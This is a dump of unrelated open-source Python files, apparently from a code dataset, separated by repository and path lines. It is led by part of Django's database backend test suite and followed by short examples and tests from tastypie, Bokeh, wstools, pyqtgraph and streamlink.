self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
mthornhill/django-tastypie
|
refs/heads/master
|
tests/manage_core.py
|
20
|
#!/usr/bin/env python
import os, sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings_core")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
rs2/bokeh
|
refs/heads/master
|
examples/app/sliders.py
|
7
|
''' Present an interactive function explorer with slider widgets.
Scrub the sliders to change the properties of the ``sin`` curve, or
type into the title text box to update the title of the plot.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve sliders.py
at your command prompt. Then navigate to the URL
http://localhost:5006/sliders
in your browser.
'''
import numpy as np
from bokeh.io import curdoc
from bokeh.layouts import row, widgetbox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import Slider, TextInput
from bokeh.plotting import figure
# Set up data
N = 200
x = np.linspace(0, 4*np.pi, N)
y = np.sin(x)
source = ColumnDataSource(data=dict(x=x, y=y))
# Set up plot
plot = figure(plot_height=400, plot_width=400, title="my sine wave",
tools="crosshair,pan,reset,save,wheel_zoom",
x_range=[0, 4*np.pi], y_range=[-2.5, 2.5])
plot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)
# Set up widgets
text = TextInput(title="title", value='my sine wave')
offset = Slider(title="offset", value=0.0, start=-5.0, end=5.0, step=0.1)
amplitude = Slider(title="amplitude", value=1.0, start=-5.0, end=5.0, step=0.1)
phase = Slider(title="phase", value=0.0, start=0.0, end=2*np.pi)
freq = Slider(title="frequency", value=1.0, start=0.1, end=5.1, step=0.1)
# Set up callbacks
def update_title(attrname, old, new):
plot.title.text = text.value
text.on_change('value', update_title)
def update_data(attrname, old, new):
# Get the current slider values
a = amplitude.value
b = offset.value
w = phase.value
k = freq.value
# Generate the new curve
x = np.linspace(0, 4*np.pi, N)
y = a*np.sin(k*x + w) + b
source.data = dict(x=x, y=y)
for w in [offset, amplitude, phase, freq]:
w.on_change('value', update_data)
# Set up layouts and add to document
inputs = widgetbox(text, offset, amplitude, phase, freq)
curdoc().add_root(row(inputs, plot, width=800))
curdoc().title = "Sliders"
|
esuncloud/p2pool
|
refs/heads/master
|
wstools/__init__.py
|
293
|
#! /usr/bin/env python
"""WSDL parsing services package for Web Services for Python."""
ident = "$Id$"
import WSDLTools
import XMLname
import logging
|
devs4v/devs4v-information-retrieval15
|
refs/heads/master
|
project/venv/lib/python2.7/site-packages/django/contrib/auth/migrations/0002_alter_permission_name_max_length.py
|
586
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='permission',
name='name',
field=models.CharField(max_length=255, verbose_name='name'),
),
]
|
jlombacher/pyqtgraph
|
refs/heads/develop
|
examples/CustomGraphItem.py
|
24
|
# -*- coding: utf-8 -*-
"""
Simple example of subclassing GraphItem.
"""
import initExample ## Add path to library (just for examples; you do not need this)
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
w = pg.GraphicsWindow()
w.setWindowTitle('pyqtgraph example: CustomGraphItem')
v = w.addViewBox()
v.setAspectLocked()
class Graph(pg.GraphItem):
def __init__(self):
self.dragPoint = None
self.dragOffset = None
self.textItems = []
pg.GraphItem.__init__(self)
self.scatter.sigClicked.connect(self.clicked)
def setData(self, **kwds):
self.text = kwds.pop('text', [])
self.data = kwds
if 'pos' in self.data:
npts = self.data['pos'].shape[0]
self.data['data'] = np.empty(npts, dtype=[('index', int)])
self.data['data']['index'] = np.arange(npts)
self.setTexts(self.text)
self.updateGraph()
def setTexts(self, text):
for i in self.textItems:
i.scene().removeItem(i)
self.textItems = []
for t in text:
item = pg.TextItem(t)
self.textItems.append(item)
item.setParentItem(self)
def updateGraph(self):
pg.GraphItem.setData(self, **self.data)
for i,item in enumerate(self.textItems):
item.setPos(*self.data['pos'][i])
def mouseDragEvent(self, ev):
if ev.button() != QtCore.Qt.LeftButton:
ev.ignore()
return
if ev.isStart():
# We are already one step into the drag.
# Find the point(s) at the mouse cursor when the button was first
# pressed:
pos = ev.buttonDownPos()
pts = self.scatter.pointsAt(pos)
if len(pts) == 0:
ev.ignore()
return
self.dragPoint = pts[0]
ind = pts[0].data()[0]
self.dragOffset = self.data['pos'][ind] - pos
elif ev.isFinish():
self.dragPoint = None
return
else:
if self.dragPoint is None:
ev.ignore()
return
ind = self.dragPoint.data()[0]
self.data['pos'][ind] = ev.pos() + self.dragOffset
self.updateGraph()
ev.accept()
def clicked(self, pts):
print("clicked: %s" % pts)
g = Graph()
v.addItem(g)
## Define positions of nodes
pos = np.array([
[0,0],
[10,0],
[0,10],
[10,10],
[5,5],
[15,5]
], dtype=float)
## Define the set of connections in the graph
adj = np.array([
[0,1],
[1,3],
[3,2],
[2,0],
[1,5],
[3,5],
])
## Define the symbol to use for each node (this is optional)
symbols = ['o','o','o','o','t','+']
## Define the line style for each connection (this is optional)
lines = np.array([
(255,0,0,255,1),
(255,0,255,255,2),
(255,0,255,255,3),
(255,255,0,255,2),
(255,0,0,255,1),
(255,255,255,255,4),
], dtype=[('red',np.ubyte),('green',np.ubyte),('blue',np.ubyte),('alpha',np.ubyte),('width',float)])
## Define text to show next to each symbol
texts = ["Point %d" % i for i in range(6)]
## Update the graph
g.setData(pos=pos, adj=adj, pen=lines, size=1, symbol=symbols, pxMode=False, text=texts)
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
beardypig/streamlink
|
refs/heads/master
|
tests/plugins/test_reuters.py
|
2
|
import unittest
from streamlink.plugins.reuters import Reuters
class TestPluginReuters(unittest.TestCase):
def test_can_handle_url(self):
should_match = [
'https://uk.reuters.com/video/watch/east-africa-battles-locust-invasion-idOVC2J9BHJ?chan=92jv7sln',
'https://www.reuters.com/livevideo?id=Pdeb',
'https://www.reuters.com/video/watch/baby-yoda-toy-makes-its-big-debut-idOVC1KAO9Z?chan=8adtq7aq',
'https://www.reuters.tv/l/PFJx/2019/04/19/way-of-the-cross-ritual-around-notre-dame-cathedral',
'https://www.reuters.tv/l/PFcO/2019/04/10/first-ever-black-hole-image-released-astrophysics-milestone',
'https://www.reuters.tv/p/WoRwM1a00y8',
]
for url in should_match:
self.assertTrue(Reuters.can_handle_url(url), url)
should_not_match = [
'https://example.com/index.html',
]
for url in should_not_match:
self.assertFalse(Reuters.can_handle_url(url), url)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.